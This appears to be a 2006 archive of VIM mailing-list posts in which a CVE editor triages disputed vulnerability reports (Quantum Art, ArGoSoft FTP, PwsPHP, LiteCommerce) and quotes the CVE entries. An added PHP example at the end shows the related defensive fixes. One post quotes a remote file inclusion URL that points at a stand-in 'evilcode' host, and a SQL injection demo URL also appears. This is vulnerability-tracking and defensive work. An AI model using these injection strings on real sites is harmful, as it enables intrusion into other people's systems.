(r0t: the gift that keeps on giving)

The vendor, Quantum Art, notified CVE (through NVD) that "neither p_news_id, news_and_events_new.asp not news.asp are not the part of our product, but the ASP pages that possible were created on the base of our product."

At the vendor's implicit request for proof, I examined the vendor's public web site. A demo page was not available, but the main site had the reported URLs. So, r0t's original report might have come from testing the live site.

I performed a cursory, non-invasive analysis of the URLs originally reported by r0t. news_and_events_new.asp generated various invalid SQL syntax errors based on some common manipulations of the p_news_id parameter, although "5'" did not work as might have been suggested by r0t. I did not see anything in news.asp.

I'm waiting for the vendor's response, but at this point I'm marking it as disputed with insufficient proof either way.

- Steve

======================================================
Name: CVE-2005-4486
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4486
Reference: MISC:http://pridels.blogspot.com/2005/12/qp7enterprise-sql-vuln.html
Reference: BID:16022
Reference: URL:http://www.securityfocus.com/bid/16022

** DISPUTED ** SQL injection vulnerability in Quantum Art QP7.Enterprise (formerly Q-Publishing) allows remote attackers to execute arbitrary SQL commands via the p_news_id parameter to (1) news_and_events_new.asp and (2) news.asp. NOTE: on 20060227, the vendor disputed the accuracy of this report, saying that the p_news_id, news_and_events_new.asp, and news.asp are not specifically part of their product, although they could be dynamically generated through use of the product. Some investigation by CVE suggests evidence that the news_and_events_new.asp page has at least a forced invalid SQL syntax error, but this could not be repeated for news.asp.

From coley at mitre.org Tue Feb 28 20:28:43 2006
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 28 Feb 2006 20:28:43 -0500 (EST)
Subject: [VIM] ArGoSoft FTP server remote heap overflow
Message-ID: <200603010128.k211Shvm004614@cairo.mitre.org>

[sent the following to Bugtraq]

=======================================

A buffer overflow in DELE was originally reported to Bugtraq by CorryL in March 2005, for ArGoSoft FTP 1.4.2.8 (CVE-2005-0696):

http://www.securityfocus.com/archive/1/392653

According to CorryL's disclosure timeline, no patch had been released by the disclosure date.

So, is this a rediscovery of that older issue, for the most recent version?

- Steve

From coley at mitre.org Tue Feb 28 20:48:41 2006
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 28 Feb 2006 20:48:41 -0500 (EST)
Subject: [VIM] PwsPHP ugly mess
Message-ID: <200603010148.k211mfFj004745@cairo.mitre.org>

I'm drained by the whole experience, so I'll let CVE's internal analysis fields speak for themselves.

Summary: multiple PwsPHP issues seem to have been disclosed and munged together under one roof. This appears to stem from multiple grep-and-gripe reports by papipsycho, but this cannot be proven due to non-public raw source information in the associated BID, which seems to combine 2 separate issues, although one of them doesn't seem to have an obvious attack vector based on casual source inspection.

Hooray for the provenance problem! Why oh why did I dare to ask myself the wrong question at the wrong time? :)

- Steve

P.S.
On the post-proactive vendor front, looks like the vendor is asking for security auditors for PwsPHP : http://www.pwsphp.com/index.php?mod=news&ac=commentaires&id=280 ====================================================== Name: CVE-2006-0668 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0668 Announced: 20060209 Flaw: sql-inject Reference: MISC:http://www.securityfocus.com/bid/16567/exploit Reference: BID:16567 Reference: URL:http://www.securityfocus.com/bid/16567 Reference: SECUNIA:19023 Reference: URL:http://secunia.com/advisories/19023 SQL injection vulnerability in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter, possibly in message.php in the espace_membre module. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Analysis: ACCURACY: the exploit tab in BID:16567 includes the demonstration URL "index.php?mod=espace_membre&ac=message&id=999999[SQL]". Source code inspection shows that index.php uses the "mod" and "ac" parameters to construct an include statement for modules/espace_membre/message.php. The use of an 'id' parameter could not be found using casual inspection. ACCURACY: the fully functioning exploit code that is linked in BID:16567 is for profil.php/aff_news_form, which appears to be a different vulnerability. ====================================================== Name: CVE-2006-0942 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0942 Announced: 20060209 Flaw: sql-inject Reference: MISC:http://downloads.securityfocus.com/vulnerabilities/exploits/PwsPHP_SQL_Inj.php Reference: BID:16567 Reference: URL:http://www.securityfocus.com/bid/16567 SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the aff_news_form parameter, a different vulnerability than CVE-2005-1509. 
Analysis:

ACCURACY: the exploit tab in BID:16567 includes an example URL that seems to involve espace_membre, but that may be for a different issue. The actual functioning program included in BID:16567 is for this profil.php/aff_news_form issue.

ACCURACY: A source code review of profil.php in 1.2.3 shows the use of aff_news_form in an input form, but the input has a maximum length specifier, possibly indicating attempts at client-side restrictions. On resubmission to the same profil.php, $aff_news_form is directly inserted into an SQL query, as called by the reqmysql function, which primarily calls mysql_query().

======================================================
Name: CVE-2006-0943
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0943
Announced: 20060209
Flaw: sql-inject
Reference: BUGTRAQ:20060225 PwsPHP Injection SQL on Index.php
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/426084/100/0/threaded
Reference: BUGTRAQ:20060226 Re: PwsPHP Injection SQL on Index.php
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/426183/100/0/threaded
Reference: MISC:http://www.pwsphp.com/index.php?mod=news&ac=commentaires&id=278

SQL injection vulnerability in the sondages module in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.

Analysis:

ACKNOWLEDGEMENT: The PwsPHP forum with the fix is in another language, but source inspection of the suggested patch shows that modules/sondages/index.php was fixed on Feb 27 (2 days after disclosure) and cleanses the id parameter using intval().

From coley at linus.mitre.org Tue Feb 28 22:00:25 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 28 Feb 2006 22:00:25 -0500 (EST)
Subject: [VIM] Concurrence with vendor dispute - LiteCommerce SQL injection
Message-ID:

I see that some vuln DBs have deleted their entries for the claimed LiteCommerce SQL injection issue by Diabolic Crab.
After some more prompting from the vendor, I've looked into the problem some more. My investigations were, by necessity, minimal since I do not have the product. With those restrictions, I was unable to verify Diabolic Crab's claims, beyond triggering a SQL syntax error that did not include path disclosure or any system-specific information leak.

With that, I've decided to treat CVE-2005-1032 as an issue to be slated for a "REJECT".

Note that Secunia pointed to a news item titled "LITECOMMERCE SECURITY BULLETIN #20050411" which seems to give a public explanation from the vendor:

http://www.litecommerce.com/news.html

Note - during my investigations, I ran across http://www.securiteam.com/unixfocus/5TP0E0KFFA.html , which has an alternate angle that smells like eval injection or something similar.

- Steve

---------- Forwarded message ----------
Date: Tue, 28 Feb 2006 21:49:34 -0500 (EST)
From: Steven M. Christey
To: Litecommerce Sales
Cc: cve at mitre.org
Subject: Re: CVE-2005-1032

Hello,

I have investigated this issue a little further, and it does appear that while your product might generate SQL syntax errors that reveal portions of the underlying database fields and tables, it does not leak sensitive information related to the actual system. Therefore this does not satisfy CVE's definition of a vulnerability or an exposure.

The CVE description has been modified as below. I have weakened the description and emphasized that the researcher's original claims could not be verified.
Regards,
Steve Christey
CVE Editor

======================================================
Name: CVE-2005-1032
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1032
Reference: BUGTRAQ:20050406 LiteCommerce Sql injection and reveling errors vulnerability
Reference: URL:http://marc.theaimsgroup.com/?l=bugtraq&m=111281524405632&w=2
Reference: MISC:http://digitalparadox.org/advisories/lico.txt
Reference: BID:13044
Reference: URL:http://www.securityfocus.com/bid/13044
Reference: OSVDB:15314
Reference: URL:http://www.osvdb.org/15314
Reference: SECUNIA:14857
Reference: URL:http://secunia.com/advisories/14857
Reference: XF:litecommerce-cart-sql-injection(19998)
Reference: URL:http://xforce.iss.net/xforce/xfdb/19998

** REJECT ** cart.php in LiteCommerce might allow remote attackers to obtain sensitive information via invalid (1) category_id or (2) product_id parameters. NOTE: this issue was originally claimed to be due to SQL injection, but the original researcher is known to be frequently inaccurate with respect to bug type and severity. The vendor has disputed this issue, saying "These reports are credited to malicious person we refused to hire. We have not taken legal action against him only because he is located in India. The vulnerabilites reported can not be reproduced, hence information you provide is contrary to fact." Further investigation by CVE personnel shows that an invalid SQL syntax error could be generated, but it only reveals portions of underlying database structure, and it does not appear to lead to path disclosure. Therefore, this issue is not a vulnerability or an exposure, and it probably should be REJECTED.
From jericho at attrition.org Tue Feb 28 23:55:14 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 28 Feb 2006 23:55:14 -0500 (EST)
Subject: [VIM] Knowledgebases Remote Command Execution
In-Reply-To: <20060227123040.18672.qmail@securityfocus.com>
References: <20060227123040.18672.qmail@securityfocus.com>
Message-ID:

: http://www.activecampaign.com/support/
:
: Version : 1-2-All KB
: * KnowledgeBuilder KB
: * iSalient KB
: * SupportTrio KB
: * visualEdit KB
: * General KB
:
: This is a support-faq script. The questions is asked. But this a script
: high the risk at bug. Malicious person to reach far away.
:
: Vulnerable :
:
: http://www.site.com/[path]/index.php?page=http://evilcode?&cmd=

This was reported on Mar 12, 2005 by Francisco Alisson, and apparently not patched since then.

http://archives.neohapsis.com/archives/bugtraq/2005-03/0213.html
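As an added example (not code from PwsPHP, Knowledgebases or CVE), the two fixes this thread touches on side by side: the intval() cleanse that the PwsPHP sondages fix applies to its id parameter before the value reaches mysql_query(), and an allow-list for a "page" include parameter of the kind in the Knowledgebases report above. The table name "sondages" and all function names are assumptions.

```php
<?php
// Added example, not code from PwsPHP, Knowledgebases or CVE. It contrasts
// the pattern CVE's analysis describes (a GET parameter interpolated straight
// into the string handed to mysql_query()) with the intval() cleanse of the
// Feb 27 PwsPHP fix, and applies the same idea to an include target.
// The table name "sondages" and the function names are assumptions.

// Before: the id value is interpolated unchanged, so anything following the
// digits becomes part of the SQL statement.
function poll_query_unsafe(string $id): string {
    return "SELECT * FROM sondages WHERE id = $id";
}

// After: intval() keeps only a leading integer; trailing text is dropped and
// non-numeric input becomes 0, so the parameter cannot alter the query.
function poll_query_safe(string $id): string {
    $clean = intval($id);
    return "SELECT * FROM sondages WHERE id = $clean";
}

// Same principle for a "page" parameter: map known names to files through an
// allow-list so that a URL or filesystem path never reaches include().
const PAGE_MAP = ['home' => 'pages/home.php', 'faq' => 'pages/faq.php'];

function resolve_page(string $page): ?string {
    // null tells the caller to answer 404 instead of calling include()
    return PAGE_MAP[$page] ?? null;
}

// Constructed inputs, reusing the demonstration strings quoted in the thread.
foreach (['42', '999999[SQL]', 'abc'] as $id) {
    printf("%-12s unsafe: %s\n", $id, poll_query_unsafe($id));
    printf("%-12s safe:   %s\n", $id, poll_query_safe($id));
}

var_dump(resolve_page('faq'));
var_dump(resolve_page('http://evilcode?&cmd='));
```

The intval() approach only works for parameters that are by design integers; for string parameters such as aff_news_form the equivalent is a parameterized query rather than a cast.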